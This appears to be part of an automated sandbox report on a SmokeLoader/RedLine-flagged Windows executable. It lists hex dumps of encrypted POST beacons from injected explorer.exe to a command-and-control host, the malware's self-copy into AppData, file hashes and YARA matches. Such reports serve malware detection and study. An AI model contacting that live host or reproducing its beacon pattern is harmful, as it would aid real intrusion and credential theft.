                                                                                                                            Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
                                                                                                                            2024-10-03 00:53:30 UTC6INData Raw: 4e 13 8c ae b0 c6
                                                                                                                            Data Ascii: N
                                                                                                                            2024-10-03 00:53:30 UTC2INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2024-10-03 00:53:30 UTC8192INData Raw: 32 30 30 30 0d 0a 37 b1 80 d9 81 f6 4a 57 1f 8f 04 5f c4 c1 88 46 ee 18 f5 d8 fe a1 a3 c6 ae 36 1a 9c e0 fa 7a 50 95 22 b4 51 4c 25 b1 f4 18 0d 15 d0 06 0a 15 7b 22 d8 b8 63 41 09 53 8a 61 25 04 92 dd b9 c8 34 da 29 b1 d3 b5 7c 9b b7 ff 21 7f 68 a2 a1 99 ca f2 df ce 53 bb f5 67 4b 05 db de 01 f7 41 65 c4 8c 62 3c 94 b8 4a 79 8f 0f fc ed 98 91 1c 6c 74 27 cb 44 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 66 b6 ee 85 11 52 c9 be 4e b1 d6 66 9c d8 30 3f 8d 93 5a f4 d5 f2 5f 31 3d a5 2f 45 84 49 21 aa 61 87 37 f6 f5 9a 70 4c 4c f9 1d fb e1 fe d1 ef cb f9 05 71 1e 89 dd 8a 35
                                                                                                                            Data Ascii: 20007JW_F6zP"QL%{"cASa%4)|!hSgKAeb<Jylt'DUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vfRNf0?Z_1=/EI!a7pLLq5
                                                                                                                            2024-10-03 00:53:30 UTC6INData Raw: eb 47 a6 2d 95 51
                                                                                                                            Data Ascii: G-Q
                                                                                                                            2024-10-03 00:53:30 UTC2INData Raw: 0d 0a
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.44978223.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:31 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://mlgxdfcmbix.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 349
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:31 UTC349OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 66 34 01 83 b6 25 93 3c 58 d9 7c ec d5 a9 54 13 f0 30 1a 9a 5c c5 da 3c 07 e5 19 1b 2d 90 b2 f4 24 c2 b8 76 1a 89 ec 4a 9a 60 5b 9e c4 0a 12 41 79 53 45 cc 3e b0 84 db 12 eb b3 38 7b 45 8c 0c 25 f7 54 13 da 82 fc ba 0d 74 80 46 d5 7f ad 39 5c 92 56 cb 64 7d 5d 07 41 ad e9 01 f9 a4 09 97 5b 6c e3 e2 cc 5d b9 86 55 86 96 ed b7 5c 70 bd d1 92 40 23 95 4f 0c d6 1e 63 57 fd 6c 77 49 ac 33 17 0e ea a8 cf 14 6a 98 cc 15 b5 49 f5 c7 b0 11 62 75 34 d0 48 77 18 24 37 cd 54 9e 99 2d 50 03 4f 07 c0 8a 78 2c 4a 01 bd f1 98 06 fc ae 0a dc 43 dd ed e5 dc 7d c9 22
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[ALf4%<X|T0\<-$vJ`[AySE>8{E%TtF9\Vd}]A[l]U\p@#OcWlwI3jIbu4Hw$7T-POx,JC}"
                                                                                                                            2024-10-03 00:53:31 UTC287INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:31 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 409
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            2024-10-03 00:53:31 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.2.44978323.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:32 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://esxqwevqdpc.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 344
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:32 UTC344OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 67 34 01 83 b7 25 93 3c 5d ba 3a 8f b9 ab 12 0c b1 63 14 83 7c e8 9b 16 31 db 1e 12 6d a4 d1 d5 39 ab a1 57 1f c5 e0 3d 99 35 3c 8b fe 05 22 24 02 10 01 e1 17 92 da d9 28 8e e6 56 0e 4c f6 64 3b b0 21 5a de 9f 9d b9 59 77 ba 5f a2 68 ae 79 62 c0 4e ac 76 31 2e 28 41 e4 be 69 ee be 04 ea 13 08 81 cd 94 1d e0 fe 07 a1 c7 9e d1 16 5c c3 c8 a1 14 48 8a 0f 17 cf 74 12 53 b9 6d 20 37 ea 47 7e 4f d8 96 94 6c 55 94 b3 00 e7 29 c9 d5 a2 11 38 77 2d da 4b 05 71 29 10 b2 32 9f ac 7b 35 26 56 38 fe be 4c 20 57 53 9d c6 8e 35 cc dc 15 f0 21 87 b4 cc c7 6b 85 7a
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lg4%<]:c|1m9W=5<"$(VLd;!ZYw_hybNv1.(Ai\HtSm 7G~OlU)8w-Kq)2{5&V8L WS5!kz
                                                                                                                            2024-10-03 00:53:32 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:32 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.2.44978423.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:33 UTC290OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://jsjqksunoqiwyetj.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 212
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:33 UTC212OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 64 34 01 83 b7 25 93 3c 53 d2 66 b6 80 db 21 11 e2 2b 06 b2 69 e2 ca 3a 6e c1 3f 35 64 a9 bc e8 3f ee c8 72 61 c6 a1 7d 9a 37 59 ee fc 5c 31 44 5b 44 22 9a 21 da e0 af 34 f2 a5 62 02 5d bd 62 3d d6 39 5d c6 c3 99 85 50 2c 84 0b a3 29 af 34 77 a0 4c d7 46 59 29 27 71 a4 e5 7b be 96 1c d6 0b 11 e9 d8 b4 37 ed 97 57 ae d9 99 a1 49 32 91 a7 d5 60 56 b1 05 0c e1 3a 13 53 8b 58 35 2c d5 3c 70 04 e7 c3 86 2f 59 98 a6 3a fd 63 aa
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Ld4%<Sf!+i:n?5d?ra}7Y\1D[D"!4b]b=9]P,)4wLFY)'q{7WI2`V:SX5,<p/Y:c
                                                                                                                            2024-10-03 00:53:33 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:33 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            18192.168.2.44978523.145.40.1624436916C:\Windows\SysWOW64\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:37 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://calvinandhalls.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 4431
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:37 UTC4431OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 5d cf 27 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 60 11 1a eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad cf 1e c8 35 78 ec cf a1 3a dd bf 5a 9c b9 91 a3 17 4e b1 d1 85 6a 24 b5 69 28 ed 0f 51 1e 91 2c 13 4f cb 21 37 3f 85 b8 db 25 42 8a fa 4d c6 42 99 f8 cf 13 08 0e 56 c3 1d 01 49 29 2d d7 2c 8d b5 13 36 13 26 14 e7 87 25 58 0f 3d aa ea 9e 23 d7 ce 20 e3 7a 96 a0 c8 a9 79 86 4f
                                                                                                                            Data Ascii: rljJ,ey1r3}unluIP g3@ZFLj4%<]'*%Qg3FIvw]3-jG`i".A9&FiVbT ?TKLu|5x:ZNj$i(Q,O!7?%BMBVI)-,6&%X=# zyO
                                                                                                                            2024-10-03 00:53:38 UTC287INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:38 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 409
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            2024-10-03 00:53:38 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            19192.168.2.44979123.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:54:53 UTC290OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://imnavngaywaiojfw.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 109
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:54:53 UTC109OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                            2024-10-03 00:54:53 UTC285INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 03 Oct 2024 00:54:53 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 7
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            2024-10-03 00:54:53 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            20192.168.2.44979323.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:55:09 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://jhrmvdleayp.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 109
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:55:09 UTC109OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                            2024-10-03 00:55:09 UTC285INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 03 Oct 2024 00:55:09 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 7
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            2024-10-03 00:55:09 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            21192.168.2.44979523.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:55:27 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://tcfngkdpgqhcen.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 109
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:55:27 UTC109OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                            2024-10-03 00:55:27 UTC285INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 03 Oct 2024 00:55:27 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 7
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            2024-10-03 00:55:27 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            22192.168.2.44979723.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:55:44 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://kskwnlkfffwemep.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 109
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:55:44 UTC109OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                            2024-10-03 00:55:44 UTC285INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 03 Oct 2024 00:55:44 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 7
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            2024-10-03 00:55:44 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            23192.168.2.44979923.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:56:00 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://wiquilejyybabo.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 109
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:56:00 UTC109OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                            2024-10-03 00:56:00 UTC285INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 03 Oct 2024 00:56:00 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 7
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            2024-10-03 00:56:00 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                            Data Ascii:


                                                                                                                            Click to jump to process

                                                                                                                            Click to jump to process

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Click to jump to process

                                                                                                                            Target ID:0
                                                                                                                            Start time:20:51:57
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Users\user\Desktop\v173TV3V11.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\v173TV3V11.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:245'760 bytes
                                                                                                                            MD5 hash:C108169F00FF9C5AD6FA70DF9137E44A
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:1
                                                                                                                            Start time:20:52:03
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                            File size:5'141'208 bytes
                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:5
                                                                                                                            Start time:20:52:23
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\bsjhhuh
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\bsjhhuh
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:245'760 bytes
                                                                                                                            MD5 hash:C108169F00FF9C5AD6FA70DF9137E44A
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
